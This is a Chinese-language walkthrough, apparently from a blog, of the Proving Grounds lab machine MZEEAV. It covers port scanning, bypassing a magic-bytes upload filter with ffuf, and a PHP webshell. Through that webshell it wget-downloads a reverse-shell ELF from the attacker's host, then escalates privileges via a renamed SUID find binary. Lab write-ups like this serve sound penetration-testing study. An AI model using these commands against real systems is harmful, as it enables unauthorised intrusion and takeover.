当前位置: 首页 > news >正文

PG靶机复现 MZEEAV

端口扫描

nmap -sC -sV -Pn -n -T4 -p- 192.168.229.33

在这里插入图片描述

枚举

在这里插入图片描述
目录扫描
在这里插入图片描述

在这里插入图片描述
发现backup.zip文件
在这里插入图片描述
查看其中的upload.php代码发现是检查magicbytes

绕过bypass

下载magicbytes数据库,这个不错

https://github.com/FanaticPythoner/pyMagicBytes/blob/master/DB

提取:

cat ./DB | awk -F '|' '{print $3}' | sort -u > ./magic_bytes_hex.txt

然后使用burpsuite抓包
在这里插入图片描述
将请求保存到本地文件,方便使用
需要在请求中添加FUZZ,告诉ffuf工具进行利用
在这里插入图片描述

然后

ffuf -c --request-proto http -w <(while read h; do echo $(echo $h | xxd -r -p); done < ./magic_bytes_hex.txt) -request ./fufftest -fr 'Unsupported file type!'

在这里插入图片描述可以看见已经绕过
在这里插入图片描述
成功,拿到一个webshell
在这里插入图片描述
测试一下80端口是否可以出站,没问题
上传恶意elf文件
在这里插入图片描述

http://192.168.229.33/upload/mime_shell.php?cmd=wget%20http://192.168.45.227/reshell%20-O%20/tmp/reshell

在这里插入图片描述

http://192.168.229.33/upload/mime_shell.php?cmd=chmod%20777%20/tmp/reshell

在这里插入图片描述
成功拿到shell

提取

先拿到一个TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm-256color
Ctrl + z
stty raw -echo;fg
reset

在这里插入图片描述
拿到local.txt,
然后我喜欢上传linpeas.sh和pspy64进行枚举

发现一个未知的suid二进制文件
在这里插入图片描述
在这里插入图片描述
检查用法,发现就是find,名字改了
在这里插入图片描述
在这里插入图片描述
利用
在这里插入图片描述
成功

相关文章:

  • 硬编码(修改RIP相关指令)
  • 关于AUTOSAR AP 开发流程的研究
  • 【QT】控件一(QWidget、Button、Label)
  • Step-Audio-AQAA 解读:迈向「纯语音」交互的端到端 LALM 新里程
  • 将 CSV 转换为 Shp 数据
  • 关于Javascript ES6箭头函数用法的分析,函数声明的几个方式
  • CTF实战技巧:获取初始权限后如何高效查找Flag
  • S参数对称性及能量守恒
  • Qwen3 Embedding 测试
  • 【python深度学习】Day53 对抗生成网络
  • squirrel 语言入门教程
  • TLSF 内存分配器
  • Boost.Pool 和 Boost.Fast_Pool 介绍与使用
  • FreeRTOS的低功耗Tickless模式
  • 【计算机网络】非阻塞IO——epoll 编程与ET模式详解——(easy)高并发网络服务器设计
  • 负载均衡器:Ribbon和LoadBalance
  • thinkphp8提升之查询
  • 深度解析JavaScript闭包:从原理到高级应用
  • 物理“硬核”切换镜头!Pura 80 Ultra一镜双目镜头切换的仪式感
  • Veeam Backup Replication系统的安装与使用
  • 视频网站建站免费/软文推广怎么做
  • 手机如何建免费网站/搜索引擎营销sem
  • 网站开发和推广的不同/军事新闻 今日关注
  • 嘉兴网站制作公司/网站建设公司网站
  • 如何看网站空间问题/seo站内优化培训
  • 松原做网站的公司/关键词上首页软件